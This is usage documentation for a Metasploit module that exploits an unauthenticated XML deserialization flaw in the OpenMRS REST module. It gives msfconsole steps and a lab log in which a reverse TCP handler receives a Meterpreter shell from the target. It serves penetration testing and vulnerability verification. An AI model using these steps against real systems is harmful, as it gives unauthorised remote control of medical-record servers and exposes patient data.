## Vulnerable Application

  OpenMRS is an open-source platform that supplies
  users with a customizable medical record system.

  There exists an object deserialization vulnerability
  in the `webservices.rest` module used in OpenMRS Platform
  for versions below `v2.24.0`. Unauthenticated remote code
  execution can be achieved by sending a malicious XML payload
  to a Rest API endpoint such as `/ws/rest/v1/concept`.

  Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).

  Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
  8 and Java 9.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/openmrs_deserialization```
  4. Do: ```set TARGETURI <uri>```
  5. Do: ```set RHOSTS <ip>```
  6. Do: ```run```
  7. You should get a shell.

## Scenarios

### OpenMRS Platform `v2.1.2`

  ```
  msf > use exploit/multi/http/openmrs_deserialization
  msf exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176
  rhosts => 192.168.37.176
  msf exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
  targeturi => /openmrs-standalone
  msf exploit(multi/http/openmrs_deserialization) > check
  [*] 192.168.37.176:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
  msf exploit(multi/http/openmrs_deserialization) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Target is running OpenMRS
  [*] Sending payload...
  [*] Sending stage (3021284 bytes) to 192.168.37.176
  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.176:47056) at 2019-12-04 12:18:50 -0600

  meterpreter > getuid
  Server username: uid=1000, gid=1000, euid=1000, egid=1000
  meterpreter > sysinfo
  Computer     : 192.168.37.176
  OS           : Ubuntu 18.04 (Linux 5.0.0-36-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  ```
